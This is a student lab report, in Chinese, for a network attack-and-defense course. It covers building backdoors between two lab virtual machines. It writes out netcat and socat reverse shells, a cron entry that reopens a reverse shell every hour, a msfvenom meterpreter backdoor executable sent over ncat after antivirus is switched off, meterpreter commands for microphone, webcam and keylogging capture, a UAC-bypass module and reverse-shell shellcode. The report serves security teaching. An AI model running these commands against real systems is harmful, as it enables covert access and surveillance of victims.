20202413 2021-2022-2 《网络与系统攻防技术》实验二实验报告

文章目录

20202413 2021-2022-2 《网络与系统攻防技术》实验二实验报告
- 1.实验内容
- - 1.1 实验要求
  - 1.2 问题回答
- 2.实验过程
- - 2.1 实验环境
  - 2.2 使用netcat获取主机操作Shell，cron启动某项任务
  - 2.3 使用socat获取主机操作Shell, 任务计划启动
  - 2.4 使用MSF meterpreter（或其他软件）生成可执行文件，利用ncat或socat传送到主机并运行获取主机Shell
  - 2.5 使用MSF meterpreter（或其他软件）生成获取目标主机音频、摄像头、击键记录等内容，并尝试提权
  - 2.6 使用MSF生成shellcode,注入到实践1中的pwn1中，获取反弹连接Shell
- 3.问题及解决方案
- 4.学习感悟、思考等
- 参考资料

1.实验内容

1.1 实验要求

win主机使用netcat获取linux主机的Shell，接着利用该Shell使用cron启动自定义任务
linux主机使用socat获取win主机的Shell, 接着利用该Shell添加任务计划程序
linux主机使用MSF meterpreter（或其他软件）生成可执行文件，利用ncat或socat传送到win主机，进而获取win主机Shell
linux主机使用MSF meterpreter（或其他软件）获取win主机音频、摄像头、击键记录等内容，并尝试绕过UAC限制提权
linux主机使用MSF生成shellcode，注入到实验一的pwn1中，获取反弹连接Shell

1.2 问题回答

例举你能想到的一个后门进入到你系统中的可能方式？
我去第三方网站下载了某个破解版软件，该破解版软件中留了后门，一旦运行软件就会出事。
例举你知道的后门如何启动起来(win及linux)的方式？
开机自启动，与其他程序绑定，通过定时任务触发等等。
Meterpreter有哪些给你印象深刻的功能？
能获取目标主机音频、摄像头、击键记录等内容，甚至能进行提权，使得被攻击方的隐私信息暴露无遗。
如何发现自己有系统有没有被安装后门？
- 安装杀毒软件，定期检测主机安全状况，及时更新杀软的特征库
- win主机可以通过“任务计划程序”和“注册表”查看是否有可疑任务
- 留意使用过程中主机是否出现异常现象，如磁盘损坏、无故黑屏蓝屏等等

2.实验过程

2.1 实验环境

两台虚拟机，一个是kali（192.168.3.23），另一个是win10（192.168.3.30），均开启桥接模式
ncat和socat。由于kali中已经默认安装了这两个工具，仅需要下载到win10中即可。下载链接：NetSec，选择下载量最大的两个即可。

2.2 使用netcat获取主机操作Shell，cron启动某项任务

netcat作为底层工具，可实现TCP/UDP数据收发
linux中任务的定时启动通过crontab进行

首先在win10中开启监听，注意进入到ncat.exe所在的工作目录下：

ncat.exe -l -p 2413  #端口号2413

接着在kali中通过ncat与win10主机建立反弹式连接：

nc 192.168.3.33 2413 -e /bin/sh  #IP是win10主机的，端口保持一致

可见成功获取了kali的shell：

如果在linux终端上执行下面的命令，结果如下：

crontab -e   #执行文字编辑器来设定时程表，这里选择的是2：/usr/bin/vim.basic
30 * * * * /bin/netcat 192.168.3.30 2413 -e /bin/sh #IP地址是win主机的，在每小时的第30分钟启动任务
crontab -l  #查看时程表

但是我们现在需要在win10中通过刚刚获得的shell来进行操作：

我们会发现kali终端弹出了警告，并且在win10获得的shell中无法进行文件修改操作。因此我们考虑从kali中记录定时任务的文件本身（/var/spool/cron目录下）入手，以root身份打开：

注意，crontabs目录下如果没有root文件，则需要在root模式下输入crontab -e，设定文字编辑器并修改时程表，这样会自动生成一个root文件。
我们不能使用kali文件来进行实验，会报zsh: permission denied: /var/spool/cron/crontabs/kali的错误。此时我们的身份为root，只能对root文件进行修改。只有我们的身份是普通用户kali时，才能对kali文件进行修改。然而要想通过绝对路径去访问时程表目录下的文件，必须是root身份才行。

因此我们需要通过win10获取的shell，先进入root模式，然后通过echo命令直接对文件本身进行修改（截图并非第一次进入root模式，故未输入密码）：

echo "* * * * * echo "20202413" > /home/kali/mwm.txt" > /var/spool/cron/crontabs/root  #每分钟定时执行一次，用“20202413”覆盖文件mwm.txt

可见达到了预期的实验效果。

2.3 使用socat获取主机操作Shell, 任务计划启动

socat：功能与netcat类似，可看做netcat++。具有netcat所不具备的功能，如建立ssl连接。

首先在win10的cmd中进入到socat所在的目录下，开启监听：

socat.exe tcp-listen:2413 exec:cmd.exe,pty,stderr    #把cmd.exe绑定到端口2413，并把cmd.exe的stderr重定向到stdout

接着在kali上使用socat与win主机建立连接，可获得其shell：

socat - tcp:192.168.3.33:2413    #连接远程端口

发现出现乱码，通过显示UTF-8设置解决大部分乱码问题：

chcp 65001   #chcp能够显示或设置活动代码页编号。
#65001——UTF-8代码页；950——繁体中文；936——简体中文默认的GBK；437——MS-DOS美国英语

接着通过命令行创建任务计划，用到 schtasks 命令（windows命令行添加任务计划）：

schtasks /create /sc minute /mo 1 /tn “test” /tr C:\Users\Public\test.exe    #每分钟执行一次test.exe

//test.c，编译生成test.exe
#include <stdio.h>
#include <stdlib.h>
#include <time.h>int main(void)
{char *wday[] = {"Sun", "Mon", "Tue", "Wed", "Thu", "Fri", "Sat"};time_t timep;struct tm *p;time (&timep);p=gmtime(&timep);FILE *fp;fp = fopen("C:\\Users\\Public\\mwm.txt","a+");fprintf(fp,"%s","Hello ");fprintf(fp,"%d/%d/%d ", (p->tm_year+1900), (p->tm_mon+1), p->tm_mday);fprintf(fp,"%s %d:%d:%d\n", wday[p->tm_wday], ((p->tm_hour)+8)%24, p->tm_min, p->tm_sec);fclose(fp);return 1;
}

稍作等待，发现成功出现预期结果：

2.4 使用MSF meterpreter（或其他软件）生成可执行文件，利用ncat或socat传送到主机并运行获取主机Shell

Meterpreter是Metasploit框架中的一个扩展模块，作为溢出成功以后的攻击载荷使用，攻击载荷在溢出攻击成功以后可以给我们返回一个控制通道。

首先在kali上生成可执行文件20202413_backdoor.exe：

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.3.23 LPORT=2413 -f exe > 20202413_backdoor.exe    #主机IP和端口号都是本地的

接着在win10的“病毒与威胁防护”设置中关闭“实时保护”，避免后门程序被杀软识别，然后将后门程序从kali传送给win10：

ncat.exe -l 2413 > 20202413_backdoor.exe  #win10终端
nc 192.168.3.30 2413 < 20202413_backdoor.exe #kali终端。IP地址为win10主机的

紧接着在kali中进入MSF控制台，并进行参数配置：

msfconsole   #进入控制台
use exploit/multi/handler   #使用监听模块
set payload windows/meterpreter/reverse_tcp #使用和生成后门程序时相同的payload
set LHOST 192.168.3.23  #kali的IP，需要和之前生成后门程序时设置的IP相同
set LPORT 2413  #设置端口，需要和之前生成后门程序时设置的端口相同
show options    #显示参数配置情况，同时也是检查参数是否正确设置的必要步骤
exploit #开启监听

此时在win主机中运行之前传入的后门程序，kali即可获得win主机的shell：

2.5 使用MSF meterpreter（或其他软件）生成获取目标主机音频、摄像头、击键记录等内容，并尝试提权

基于刚刚获得的shell，继续执行命令获得主机更多信息：

record_mic -d 10  #截获音频，-d用来设置录制时间
screenshot  #截屏
webcam_snap #打开摄像头拍照
keyscan_start #开始记录击键过程
keyscan_dump #读取击键记录

接下来尝试提权。我使用了0x22_MAL_后门进阶应用Meterprter.md中的exploit/windows/local/ask模块，并成功提权。
正常情况下，我们得到Administor权限的进程，使用meterpreter内置的getsystem提权时会失败：

故可以用exploit/windows/local/ask模块，模拟一个UAC确认窗口，欺骗用户点击，从而获取权限：

问题2：exploit/windows/local/ask模块执行失败

2.6 使用MSF生成shellcode,注入到实践1中的pwn1中，获取反弹连接Shell

首先使用msf生成需要的shellcode：

msfvenom -p linux/x86/shell_reverse_tcp LHOST=192.168.3.23 LPORT=2413 -f c

接着按照上一个实验的做法，设置堆栈可执行，关闭地址随机化，构造攻击字符串如下：

然后在msf控制台上打开监听，另开一个终端运行pwn20202413：
可见成功获取了另一个shell的权限。

3.问题及解决方案

问题1：进行步骤2.5时无法获取win10主机的摄像头
问题1解决方案：macbook默认没有给VMware Fusion获取电脑摄像头的权限，把权限开启即可：
问题2：进行步骤2.5的提权操作时exploit/windows/local/ask模块未能正常运行：
问题2解决方案：查看参数配置情况，发现LPORT被修改成了默认值4444，修改回2413即可：

4.学习感悟、思考等

通过这次实验，我掌握了netcat，socat和Meterpreter的使用方式，学会了如何在win和linux下设置定时任务，学会了如何生成自己的后门程序。与此同时，我对于反弹式连接也有了深入的理解和体会。这次实验的难点我认为在于对绕过UAC（User Access Control）提权的分析和实践，其他的实验操作照着指导书敲指令就能完成。除了我所使用的exploit/windows/local/ask模块，还有很多针对Windows平台的local exploit。而且我发现在本实验中，如果在win10上用管理员身份运行后门程序的话也可以达到提权的目的。

参考资料

0x21_MAL_后门原理与实践.md
0x22_MAL_后门进阶应用Meterprter.md
Linux crontab 命令
Meterpreter命令详解
windows命令行添加任务计划